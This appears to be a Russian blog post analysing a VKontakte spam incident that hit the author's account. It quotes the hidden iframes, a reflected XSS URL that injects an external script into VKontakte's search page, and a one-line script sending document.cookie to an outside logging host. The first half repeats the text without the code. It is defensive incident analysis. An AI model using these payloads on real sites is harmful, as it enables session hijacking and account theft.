Буквально несколько минут назад я умудрился разослать 200+ сообщений своим друзьям ВКонтакте.
Естественно это было спам сообщение следующего содержания:
Собственно удивление было связано с тем, что:
1. Я использую Linux и только Linux везде где только можно.
2. ВКонтакт используется только из дома опять же сугубо из-под Linux
3. На ВКонтакт и на почту, привязанную к нему стоят достаточно криптостойкие пароли из 10+ символов латинского алфавита и цифрДа, я параноик
Внимание! Все последующие переходы по ссылкам вне этой статьи для Вашей безопасности советую проводить только если Вы разлогинены из ВКонтакта.
Первым делом я решил посмотреть куда же ведет эта ссылка, что я рассылал.
Ссылка вела на сайт vk-foto.ru, который сразу же редиректил на odnonochniki.ru/?rid=484
С анализа «одноночников» я решил и начать.
Тем не менее ничего вредоносного замечено не было.
«Гм», сказали суровые сибирские мужики я, закрыл Оперу, и открыл фаерфокс.
Первым делом в Web Developer Toolbar я отключил переход по META-редиректам и включил Firebug для сайта vk-foto.ru. Убедившись что в Firefox'е я разлогинен ВКонтакте, я пошел на сайт.
Анализ HTML кода быстро обнаружил желаемое:
Уже предвкушая разгадку, я набрал упомянутый адрес и получил… 404 ошибку апача.
Ну что ж, значит надо поковыряться глубже.
Для vk-foto включил панель Net Firebug'а, перезагрузил страничку и стал смотреть что грузится:
Увидев это я обругал себя последними словами. Ведь было за что:
1. Не все что выглядит как 404 Апача является ею. Код возврата НТТР надо смотреть всегда
2. Увидев «404» я даже не удосужился глянуть в ее код
Итак, очередной iframe:
Гм. А вот это уже похоже на XSS Вконтакте. На страничку поиска подсасывается внешний Javascript.
Его содержимое просто как апельсин:
Таким образом куки ВКонтакта уходят на сторонний хост.
Что из всего этого следует:
DISCLAIMER: Я прекрасно понимаю, что профессионалам в области информационной безопасности я не рассказал ничего нового. Этот пост направлен скорее на рядовых IT-шников, и призван уберечь их от наступания на мои грабли
Естественно это было спам сообщение следующего содержания:
привет я удаляюсь из контакта, оч много спама приходит((сейчас удалю свою страничку, если что-то будет нужно, то звони мне на моб.телефон или ищи меня здесь vkontakte.ru/away.php?to=… у меня там есть своя страничка под мои именем.это не спам, рассылаю всем своим друзьям...).
Собственно удивление было связано с тем, что:
1. Я использую Linux и только Linux везде где только можно.
2. ВКонтакт используется только из дома опять же сугубо из-под Linux
3. На ВКонтакт и на почту, привязанную к нему стоят достаточно криптостойкие пароли из 10+ символов латинского алфавита и цифр
Внимание! Все последующие переходы по ссылкам вне этой статьи для Вашей безопасности советую проводить только если Вы разлогинены из ВКонтакта.
Первым делом я решил посмотреть куда же ведет эта ссылка, что я рассылал.
Ссылка вела на сайт vk-foto.ru, который сразу же редиректил на odnonochniki.ru/?rid=484
С анализа «одноночников» я решил и начать.
Тем не менее ничего вредоносного замечено не было.
«Гм», сказал
Первым делом в Web Developer Toolbar я отключил переход по META-редиректам и включил Firebug для сайта vk-foto.ru. Убедившись что в Firefox'е я разлогинен ВКонтакте, я пошел на сайт.
Анализ HTML кода быстро обнаружил желаемое:
<iframe src='http://vk-foto.ru/2/1.php' style='display:none;' ></iframe>
Уже предвкушая разгадку, я набрал упомянутый адрес и получил… 404 ошибку апача.
Ну что ж, значит надо поковыряться глубже.
Для vk-foto включил панель Net Firebug'а, перезагрузил страничку и стал смотреть что грузится:
Увидев это я обругал себя последними словами. Ведь было за что:
1. Не все что выглядит как 404 Апача является ею. Код возврата НТТР надо смотреть всегда
2. Увидев «404» я даже не удосужился глянуть в ее код
Итак, очередной iframe:
<iframe src = vkontakte.ru/gsearch.php?from=ads§ion=ads&c[type]=1&c[%22%3E%3CsCRIPT%20%20src%20%3d%20http://webzer.vov.ru/vk.js%20%20%3E%3C/script%3E]=2 width='0' height='0' style='display:none' ></iframe>
Гм. А вот это уже похоже на XSS Вконтакте. На страничку поиска подсасывается внешний Javascript.
Его содержимое просто как апельсин:
location.href='http://webzer.vov.ru/css/log.php?' + document.cookie
Таким образом куки ВКонтакта уходят на сторонний хост.
Что из всего этого следует:
- то что вы пользуетесь Linux еще не защищает Вас от всего
- от любопытства кошка сдохла — получив от друга такое сообщение я пошел по ссылке, за что и поплатился
- (следует из предыдущего) никогда не ходите по ссылкам, полученным неизвестно откуда
- Не все то 404, что так выглядит :)
- Как ни печально, но и на старуху (ВКонтакте) бывает проруха.
DISCLAIMER: Я прекрасно понимаю, что профессионалам в области информационной безопасности я не рассказал ничего нового. Этот пост направлен скорее на рядовых IT-шников, и призван уберечь их от наступания на мои грабли
